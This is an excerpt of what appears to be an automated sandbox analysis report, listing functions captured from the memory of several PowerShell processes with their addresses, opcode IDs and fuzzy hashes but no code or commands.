Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1f53c43c2c1cdfeacbc3e56b637d7edd2f697d55d72b160f0e7bb7c3cbfc9b
Instruction ID: f8de7335462a8ca827ca4921cad62446361bbc6416a6deec0a0a1aaccb891c8c
Opcode Fuzzy Hash: ab1f53c43c2c1cdfeacbc3e56b637d7edd2f697d55d72b160f0e7bb7c3cbfc9b
Instruction Fuzzy Hash: 1A41DB31A1CB488FDB1C9B9CAC466F8BBE0EB95321F04426FD04993692CB757456CBC6

Function 00007FFD9A3EA62C Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2639907b4ad1992dde507603377c454c6cc1b429ba5c6703c5d5cc033e429621
Instruction ID: 21705bcd9198a71bc81fc6cd78666498ed4e9eb1481f51377929b7ec6ac8e983
Opcode Fuzzy Hash: 2639907b4ad1992dde507603377c454c6cc1b429ba5c6703c5d5cc033e429621
Instruction Fuzzy Hash: 7641083190C7884FEB59DFAC984A7E97BE0EB96331F04816FD049C3192C675645ACB92

Function 00007FFD9A3E9758 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb76b45cfd059b1f38e4fb0a7d13ce4b8ae45d175b8958def0c72689420746f
Instruction ID: 5dc0622e5ff5d35094e51827d0447377b25896b396a9792a5b6579d5fd8707a3
Opcode Fuzzy Hash: fcb76b45cfd059b1f38e4fb0a7d13ce4b8ae45d175b8958def0c72689420746f
Instruction Fuzzy Hash: F531E971A1CB488FDB5C9F5C98466ADBBE1FB98311F14416FE44983252DB30AC55CBC2

Function 00007FFD9A2CE380 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1771652000.00007FFD9A2CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A2CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a2cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25ee426049ed0049110318ff8d85a1a299f3ffe48c4ebd9e809b62ceeda696da
Instruction ID: 9158a7a7d34e98e64c42612f8f1ab4b49b21722eba782f4e9db149dc1213f980
Opcode Fuzzy Hash: 25ee426049ed0049110318ff8d85a1a299f3ffe48c4ebd9e809b62ceeda696da
Instruction Fuzzy Hash: E541387250DBC44FE76A9B38A8559623FF0EF52314B1A05EFD088CF1A3D625B846C792

Function 00007FFD9A3E33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 9d369bfa64d5877b817d5706bacde89ea542224af3341f95596b0db0e75669cb
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 2001A73121CB0C4FD748EF4CE451AA5B7E0FB85324F10056EE58AC3695DA36E882CB42

Function 00007FFD9A4B414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772921248.00007FFD9A4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a4b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a40f861356fdfddeed1dfdde098b07633b1d7fb177d3a73c1ed3a0f37d7e6b4
Instruction ID: 58fdb607b831c27bfd416b1b0376a1adb30bd6e7cd0bab612c59b8de4a4fcec6
Opcode Fuzzy Hash: 0a40f861356fdfddeed1dfdde098b07633b1d7fb177d3a73c1ed3a0f37d7e6b4
Instruction Fuzzy Hash: A9F0BE32F4C5048FD769EA4CE8558A873E0EF5532471100FBE16DC71A7CA2AEC44C781

Function 00007FFD9A4B4400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772921248.00007FFD9A4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a4b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3059d2885d0487a336986ab04f826921d1c496a2697b3b45c3b8f658edec628
Instruction ID: aa2eda569ddd85e0bcfbcb847566feef9fefc9661d4bf4e8af04d1ef3e0506e6
Opcode Fuzzy Hash: a3059d2885d0487a336986ab04f826921d1c496a2697b3b45c3b8f658edec628
Instruction Fuzzy Hash: 13F0BE32A0C5448FDB68EA5CE8518E877E0EF0532476100F7E15EC71A7CA2AAC54C781

Function 00007FFD9A4B41D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1772921248.00007FFD9A4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a4b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 2ed4424ef3a75d06929694f806a35622031d1cfdf3845083dae98ee417b60841
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 4FE01A32B4C8088FDAB8DA4CE0549AD73E1EB9833171101B7D14EC7571CA22EC518BC0

Non-executed Functions

Function 00007FFD9A3E8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

L_^7, xrefs: 00007FFD9A3E8C12
L_^4, xrefs: 00007FFD9A3E8BFA
L_^F, xrefs: 00007FFD9A3E8C7A
L_^J, xrefs: 00007FFD9A3E8C8A

Memory Dump Source

Source File: 00000001.00000002.1772149325.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9a3e0000_powershell.jbxd

Similarity

API ID:
String ID: L_^4$L_^7$L_^F$L_^J
API String ID: 0-3225005683
Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction ID: ae6b06e31a669d72ba20d538293c87f57a2b84499e5642d2c749e6ecc5e51ab2
Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction Fuzzy Hash: 012126B7B180254ED3017FBDBC169ED3740CFD423834952B2D2AC8B087EA14709A8AD1

Analysis Process: powershell.exePID: 7640, Parent PID: 7312COMMON

Executed Functions

Function 00007FFD9A4A6631 Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1889717004.00007FFD9A4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9a4a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02129bd54b06e5da15ad208ea67136fc3bd62422d659142c43d8160f2c7e3634
Instruction ID: 5b995e0b3b8c4d114f82890876ae89f9864c5de2838a7e40a538b99405c60c26
Opcode Fuzzy Hash: 02129bd54b06e5da15ad208ea67136fc3bd62422d659142c43d8160f2c7e3634
Instruction Fuzzy Hash: 65C15863F1EA8A4FEBA9ABA848645B5BBD1EF55314B0801FFD05DCB1D7DA18AC00C341

Function 00007FFD9A3D9750 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1888627685.00007FFD9A3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9a3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8e53674b9d48713619c11c7b18288443d1e300c0a1764e00308eca03dbef5a4
Instruction ID: 1f2bc574ef364e2600021f597340e0a68e534603e89cde525a57bfeedd04dcd1
Opcode Fuzzy Hash: b8e53674b9d48713619c11c7b18288443d1e300c0a1764e00308eca03dbef5a4
Instruction Fuzzy Hash: 88411A7290CB888FDB19DF5C9C5A6A97FE0FB55310F0442AFD09983292DA64B805CBC2

Function 00007FFD9A2BE8EF Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1887449037.00007FFD9A2BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A2BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9a2bd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f6ca2d226138ae839f4f74969df0b575565569ad7ad3441030708fda0f45bf
Instruction ID: c69fa388e360e2853892ac7cdbbf6cea09687750499f2d4fd00ebcbed2b29c2d
Opcode Fuzzy Hash: 01f6ca2d226138ae839f4f74969df0b575565569ad7ad3441030708fda0f45bf
Instruction Fuzzy Hash: 9C31687140DFC04FE79A8B3998559523FF0EF57324B1906DFE088CB1A3D625A84AC7A2

Function 00007FFD9A3DA49C Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1888627685.00007FFD9A3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9a3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a385a83251d78a588f5055e9adf61bb46b28c17a4f5cfa4265d8984fe34744
Instruction ID: f6cea49e3a5421350c910b4bd5b1ded9bcdbf1e0497dd436f0eb70451624a333
Opcode Fuzzy Hash: 71a385a83251d78a588f5055e9adf61bb46b28c17a4f5cfa4265d8984fe34744
Instruction Fuzzy Hash: CB21063190C64C8FDB59DFAC984A7E97BE0EB96320F04426FD049C3162DA74A846CB92

Function 00007FFD9A3DA085 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1888627685.00007FFD9A3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9a3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffad81f0d31ffcf0ee4c1b00808a6dc997dceec43e49fe34eb2a6a53f1f1d727
Instruction ID: a2a048d8b86a31643448502a6dab94887ee9ed92e656bc87e3d0d679e6c4a2b8
Opcode Fuzzy Hash: ffad81f0d31ffcf0ee4c1b00808a6dc997dceec43e49fe34eb2a6a53f1f1d727
Instruction Fuzzy Hash: 6221E862E1D3968EE705BFB858764E47B60EF51308F4C42FBD49C8B0E7ED2964588392

Function 00007FFD9A3D33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1888627685.00007FFD9A3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9a3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: a6e1be5e3be57ef2dbe19f221e6eae776fa87101a154c31f7b8f629b7424a449
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 3201A73121CB0C8FD748EF4CE451AA5B7E0FB85324F10056EE58AC3695DB36E882CB42

Function 00007FFD9A4A414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1889717004.00007FFD9A4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9a4a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7b9e131dc41957eb2cbf3604bf29f0d2bcc6d732d628006fcc042021894edc9
Instruction ID: f1818b704590e5d53726bfd840f7949bf3d1098c2105ac4343f366ee109148d3
Opcode Fuzzy Hash: a7b9e131dc41957eb2cbf3604bf29f0d2bcc6d732d628006fcc042021894edc9
Instruction Fuzzy Hash: F4F0BE32B4C5048FD769EA4CE8558A873E0EF5532471100FBE16DC71A7CA2AEC44C781

Function 00007FFD9A4A4400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1889717004.00007FFD9A4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9a4a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa28dcc943f44665c16a203e57b1e993cfec3caba790d11c217ee97ac96d1a9
Instruction ID: 971c9534061b5079fa710ec40aec37966901b8cfc4f4f5903f60735128021dfc
Opcode Fuzzy Hash: 8aa28dcc943f44665c16a203e57b1e993cfec3caba790d11c217ee97ac96d1a9
Instruction Fuzzy Hash: 4CF0BE32A0C5448FD768EA4CE8518E877E0EF4532476100F6E15EC70A7CA2ABC44C780

Function 00007FFD9A4A41D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1889717004.00007FFD9A4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9a4a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 4a7b6355fa95d3d0e34cf2de6f8ce08bfe2fb4097a46c67d3966f158b1e8b2f7
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 82E01A32B4C8088FDAB8DA4CE0549AD73E1EBA833171101B7D14EC7561CA22EC518BC0

Non-executed Functions

Function 00007FFD9A3D8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

M_^?, xrefs: 00007FFD9A3D8C2A
M_^K, xrefs: 00007FFD9A3D8C6A
M_^N, xrefs: 00007FFD9A3D8C72
M_^J, xrefs: 00007FFD9A3D8C62
M_^<, xrefs: 00007FFD9A3D8C12
M_^8, xrefs: 00007FFD9A3D8BF2
M_^Y, xrefs: 00007FFD9A3D8CBA
M_^Q, xrefs: 00007FFD9A3D8C8A

Memory Dump Source

Source File: 00000004.00000002.1888627685.00007FFD9A3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9a3d0000_powershell.jbxd

Similarity

API ID:
String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
API String ID: 0-962139525
Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
Instruction ID: 31e3112f5b97b28b8e4af51f1f69f047662d2091de191f17caa5a0cd9c08e063
Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
Instruction Fuzzy Hash: 9621B3B3A145158AD3013FBCBC529D87780DB9426938A03F7E02CCF197E918649A8AC1

Analysis Process: powershell.exePID: 7880, Parent PID: 7312COMMON

Executed Functions

Function 00007FFD9A496605 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2093079080.00007FFD9A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9a490000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9463ec90b2d49d18d9a3f25f7f46dc670c7deda37fc92604badb725ce749e223
Instruction ID: 6113714751609db3ad91a468a89bcf671eb2c6f7b4bf2345e94f753c1e348559
Opcode Fuzzy Hash: 9463ec90b2d49d18d9a3f25f7f46dc670c7deda37fc92604badb725ce749e223
Instruction Fuzzy Hash: 0BD16923A1EA894FEBA9DBA848745B5BBD0EF95754B0801FFD05DCB0D3DA18AC11C342

Function 00007FFD9A3C9FD0 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2090078490.00007FFD9A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9a3c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64aa556e7d85c7798be5a783305eb32c5da4870242bf1cf9bf2a38c58ad4e1d
Instruction ID: 6bbf42694533e38b4e0231f57c7eacbee5e00425bd21876745e2de4a0c94c3a5
Opcode Fuzzy Hash: d64aa556e7d85c7798be5a783305eb32c5da4870242bf1cf9bf2a38c58ad4e1d
Instruction Fuzzy Hash: 8341D557E1E6924FE712BFACACB24E97B60DF52259B0D01BBD0AC8A097DC14644983D2

Function 00007FFD9A3C9738 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2090078490.00007FFD9A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9a3c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee61a05ae8bc1c53e0c2904f5bc9b44d107d7efb13bc2810dcfe383160a0568
Instruction ID: e4d33baff42525c79ad4e1977f267cc71631ecc044a2545cf31b717ecd6b0a15
Opcode Fuzzy Hash: 4ee61a05ae8bc1c53e0c2904f5bc9b44d107d7efb13bc2810dcfe383160a0568
Instruction Fuzzy Hash: 9B413B72A0DA488FDB5CAF5C9C166B8BBE0FB95310F00416FE44983296DB20B805CBC2

Function 00007FFD9A3CA5F6 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2090078490.00007FFD9A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9a3c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8135f577fc076eebaee32df8d9ad896df8e488841663f6079f1a49853f30b808
Instruction ID: 4614db2aee19d6c1fec45f20facd005bf5e99c7e303419fe8b1651cc7f65b368
Opcode Fuzzy Hash: 8135f577fc076eebaee32df8d9ad896df8e488841663f6079f1a49853f30b808
Instruction Fuzzy Hash: 6331F67190D7884FEB5A9BA888596A97FF0DF93320F0841EFC049C71A3D668544ACB52

Function 00007FFD9A2AE540 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2088706726.00007FFD9A2AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A2AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9a2ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e3f3e588fd39ab20935bc585f1e660d6db3fc0571b42db43634013698678ef
Instruction ID: 61eeace44d921c660b0262e2b403d95f4372fb22f396d1e8b52f7d2e35171fb9
Opcode Fuzzy Hash: d4e3f3e588fd39ab20935bc585f1e660d6db3fc0571b42db43634013698678ef
Instruction Fuzzy Hash: FC41237140DBC45FE76A8B78AC559523FF0EF52324B1906DFD088CB1E3D629A84AC792

Function 00007FFD9A3C33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2090078490.00007FFD9A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9a3c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 1487099e010d57842d784938892b523a6e9cd6043c5fe3818f4c97f125e731fa
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: E801A73121CB0C4FD748EF4CE451AA5B7E0FB85324F10056EE58AC3695DA36E882CB42

Function 00007FFD9A49414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2093079080.00007FFD9A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9a490000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3348da4b70c8f1b1b58779bf7cbc44fbe871fa40a4d430c179a67aa3434e6f3e
Instruction ID: e15722cd195b5f342e539f2c9da8c7b04c15ff46994dd17b873bf53c105ac316
Opcode Fuzzy Hash: 3348da4b70c8f1b1b58779bf7cbc44fbe871fa40a4d430c179a67aa3434e6f3e
Instruction Fuzzy Hash: 50F0BE32B4C5048FD769EA4CE8568A873E0EF9532471100FBE16DC72A7CA2AEC54C781

Function 00007FFD9A494400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2093079080.00007FFD9A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9a490000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa294a291eb9024b2b54e91cf40ade17ded08fa61350ff9b3a219c04e3af164
Instruction ID: 3c736054243bdbbf88e9e311e75c051f35cca70b3293b55cf448977217f0b561
Opcode Fuzzy Hash: 3fa294a291eb9024b2b54e91cf40ade17ded08fa61350ff9b3a219c04e3af164
Instruction Fuzzy Hash: 83F0BE32A0C5448FDB68EA4CE8518A877E0EF4532476100F6E15EC70A7DA2AAC54C781

Function 00007FFD9A4941D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2093079080.00007FFD9A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9a490000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: cf81476f5dc2e54a98e3669ef6eed0a4c78c39e0a71f47ab0a1038c35c4d0319
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 69E01A32B4C8088FDABCDA4CE0559A973E1EB9833171101B7D14EC7661CB22EC618BC0

Non-executed Functions

Function 00007FFD9A3C8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^4, xrefs: 00007FFD9A3C8BFA
N_^F, xrefs: 00007FFD9A3C8C7A
N_^7, xrefs: 00007FFD9A3C8C12
N_^J, xrefs: 00007FFD9A3C8C8A

Memory Dump Source

Source File: 00000007.00000002.2090078490.00007FFD9A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9a3c0000_powershell.jbxd

Similarity

API ID:
String ID: N_^4$N_^7$N_^F$N_^J
API String ID: 0-3508309026
Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction ID: f82343837002a102c64a77db61b0c88949950600e368b7b1ac120855d3747233
Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction Fuzzy Hash: E42138B7B191254ED3017FBCBC259D93B40DFD423874902B2D2ACCF187E914709A8AC2

Analysis Process: powershell.exePID: 8136, Parent PID: 7312COMMON

Executed Functions

Function 00007FFD9A486605 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2296443819.00007FFD9A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a480000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c75e0f86ddc6b74f51e5fade2119c794ece1413a343536aa1ea70543190a5c1a
Instruction ID: 4f85644c13d6791c1d540b0f99257b7f518327a81ea5b725276f051aa07ec1c3
Opcode Fuzzy Hash: c75e0f86ddc6b74f51e5fade2119c794ece1413a343536aa1ea70543190a5c1a
Instruction Fuzzy Hash: 92D14822A1EAC94FEBA9EBAC58655B5BBD1EF15314B0801FFD05DCF0D7DA28A801C341

Function 00007FFD9A3B9F9A Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e68c7e17f199b79b881b9ffe63fae7e6e8d1a06cc9e7c4ad1a0608bbbdb3e84
Instruction ID: 1db597006ab771b742da5046f285c7938e736174f45f0608ee2e9d89b4f7e995
Opcode Fuzzy Hash: 0e68c7e17f199b79b881b9ffe63fae7e6e8d1a06cc9e7c4ad1a0608bbbdb3e84
Instruction Fuzzy Hash: CA51C867F1D6D28BD711BBBCA8F61E93B50DFC2229B0C44B7D09C8A0A7DC14149E86D2

Function 00007FFD9A3B9750 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d733137211c364097d23a694ce6585aab03ff03de0183cdfa3e349ba1fc2965
Instruction ID: 075873080afe9c13e900dc08755fa8a90cc32941a2085a3331a93074906d845e
Opcode Fuzzy Hash: 3d733137211c364097d23a694ce6585aab03ff03de0183cdfa3e349ba1fc2965
Instruction Fuzzy Hash: 9441177190CB884FEB199F6C9C5A6B97FE1FB55310F0441AFD09983293DA64A845CBC2

Function 00007FFD9A29ED40 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2293900007.00007FFD9A29D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A29D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a29d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b439b9379e018556313ee90ba567a47b944503d56ac114e0ac0a494412e73b8
Instruction ID: 953888a2db64b519ca21c46fd43995353efe1284b72779e2889937326f7453ae
Opcode Fuzzy Hash: 9b439b9379e018556313ee90ba567a47b944503d56ac114e0ac0a494412e73b8
Instruction Fuzzy Hash: 5941267140DBC44FE75A8B289851A523FF4EF97724B1906DFD088CF1A3D629E846C7A2

Function 00007FFD9A3BA49C Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4949c03e8f3990ea6ce19cb44266f5e27d34dbe6286829509c3595080bc569
Instruction ID: 292ba8bac13c1f0b61ff68df26a5407d4197ee099e1bd821634841f291ac7898
Opcode Fuzzy Hash: ab4949c03e8f3990ea6ce19cb44266f5e27d34dbe6286829509c3595080bc569
